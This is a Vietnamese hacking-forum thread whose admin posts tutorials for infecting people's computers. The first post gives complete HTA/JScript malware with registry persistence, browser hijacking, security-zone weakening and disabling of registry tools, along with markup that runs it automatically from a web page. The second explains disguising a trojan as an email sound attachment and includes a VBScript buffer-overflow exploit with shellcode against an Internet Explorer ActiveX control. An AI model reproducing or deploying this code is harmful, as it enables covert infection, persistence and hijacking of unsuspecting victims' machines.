HACKIS - Hacking Internet Security
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Cách đính kèm trojan vào website EmptyThu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Cách đính kèm trojan vào website EmptyThu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Cách đính kèm trojan vào website EmptyMon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Cách đính kèm trojan vào website EmptyTue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Cách đính kèm trojan vào website EmptyTue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
Cách đính kèm trojan vào website EmptyFri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
Cách đính kèm trojan vào website EmptyFri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
Cách đính kèm trojan vào website EmptyThu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
Cách đính kèm trojan vào website EmptyTue Apr 10, 2012 1:14 am by Admin

Affiliates
free forum


Cách đính kèm trojan vào website

2 posters

Go down

Cách đính kèm trojan vào website Empty Cách đính kèm trojan vào website

Post  Admin Mon Nov 22, 2010 5:43 am

Cách đính kèm trojan vào website Images?q=tbn:ANd9GcRZU1zwkhHqWBc4p2U1cXdm130pkHDMlXdXmpVFOM18ivLymdf7Ug
Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra

Code:

<html>
<head>
<script language="javascript">
try {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var Shell = new ActiveXObject("WScript.Shell");
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + "\\system32\\System.js";
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine('var url = "Địa chỉ trojon";');
a2.WriteLine('var burl = "Địa chỉ trojon";');
a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");');
a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');
a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');
a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\ \\\Windows",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies \\\\System\\\\DisableRegistryTools",1,"REG_DWORD") ;');
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>

rồi save lại với tên là : trojan.hta
bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
Code:

<center>
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="trojan.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>

rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện
Admin
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

https://hackis.forumvi.com

Back to top Go down

Cách đính kèm trojan vào website Empty Cách đính Trojan vào Mail

Post  Admin Mon Nov 22, 2010 5:49 am

"Badblood" la mot cong cu giup ban lam cho victim bi lay nhiem con trojan (cua ban) de dang hon qua con duong email.

Badblood la thuat ngu moi duoc phat hien boi Marklord, su phat hien nay giup chung ta co the chay file dinh kem (attached files) trong mail, ma` dac biet la nguoi su dung khong the biet duoc.

Badblood su dung script hidden, no khong chi anh huong den Outlook Express ma con lam anh huong toi tat ca nhung nguoi su dung IE5.0 voi Outlook Express di ke`m (install khi cai Windows), su dung Windows95 hay Windows98.

Ngay ca khi nguoi dung su dung cac trinh Mail client nhu Netscape Messager,(Eudora thi toi chua test) v.v.., se deu bi lay nhiem ca neu nhu Open file *.eml ma` toi sap huong dan ban cach tao ra chung. Ban con co the lam lay nhiem ca nguoi dung dich vu Hotmail, hoac HTML-mail, nhung chu y la ho *bat buoc* phai mo file *.eml thi moi bi lay nhiem (:<)

Buoc1:
Chung ta phai vao Internet Explorer -> Option -> Security Tab, nhan Custom Level, va tat (disable) tat ca
chuc nang cho phep chay Script(Neu khong chinh may ban se bi nhiem)

Buoc2:
Chuan bi 1 con virus, trojan,backdoor, etc., 1 chuong trinh dung de Edit nhu EditPlus, TextPad.

Buoc3:
+Chay Outlook Express, nhan New Message ->Format->Background->Picures (or Sound) (vi du file ding.wav chang han)
+ Attach them 1 file trojan, hoac virus = nu't Attach (dat ten la file.exe chang han)
+ Save ca'i email na`y ra mot thu muc nao do' tren o cung.

Buoc4:
Dung EditPlus hoac TextPad, hoac 1 chuong trinh nao do dung de edit text, mo file *.eml nay ra. Trong phan source code cua file nay se co dong nhu sau:
Ban hay Cat dong sau:

Code:
Content-Disposition: attachment;
filename="file.exe"

- Va dan vao phan dinh dang file ding.wav, no se trong nhu sau:

Code:
Content-Type: audio/wav;
name="Ding.wav"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; {Chu thich: 2 dong duoi nay la dan vao thi no moi hien ra nhu vay}
filename="file.exe"

- Sau do vao phan dinh dang attachement ding.wav ta cat dong Content-ID sau:

Code:
Content-ID: <002801bf41c9$95325940$0100007f@computername>

- dan no vao phan dinh dang cua attachement file.exe. No se trong giong nhu the nay:

Code:
Content-Type: application/x-msdownload;
name="file.exe"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- Sau do ban Save file *.eml ban vua chinh sua nay. Roi chay no' , ban se thay o phan Attach file se xuat hien cai ten [file.exe], nhung thuc chat day khong phai la cai file trojan file.exe that su dau (ban hay nhin lai dung luong cua no', dung luong cua no'=dung luong cai file ding.wav day!)
Hay xoa (Remove) cai file.exe di bang cach nhan chuot phai vao no', chon Remove.

- Bay gio ban vao phan View hoac nhan Alt + V, danh dau vao phan Source Edit. Ban se thay OE hien len 3 nut Edit, Source, Preview o cuoi phia duoi buc thu, va ban dang o phan Edit, hay nhan chuot vao phan Source roi dan doan script sau vao:

Code:
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object>
<script language="VbScript" >

expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA"

expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) +
Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "move c:\windows\temp\d*.tmp
c:\windows\startm~1\programs\startup\file.exe"

RegWizObj.InvokeRegWizard(expstr)
</script>

- Save su thay doi vua roi lai. The la xong, ban co the gui no' di cho cac victim duoc roi day.

Neu cac ban thay rac roi thi hay gui email den cho toi, toi se send cho cac ban cai source code cua Badblood, ban chi can them email cua nan nhan, subject va dinh kem file la hoan thanh cong viec.

Luc dau toi thay lam the nay rat rac roi, nhung khi thuc hanh khoang 2 ,3 lan la thanh thao ngay.
Admin
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

https://hackis.forumvi.com

Back to top Go down

Cách đính kèm trojan vào website Empty Re: Cách đính kèm trojan vào website

Post  graycap Mon Nov 22, 2010 7:53 pm

anh admin có thể cho em xin cái YH để trao đổi được không ..???
em có một số câu hỏi cần anh giúp...???? lol!

graycap

Tổng số bài gửi : 3
Join date : 2010-11-19

Back to top Go down

Cách đính kèm trojan vào website Empty Re: Cách đính kèm trojan vào website

Post  Sponsored content


Sponsored content


Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum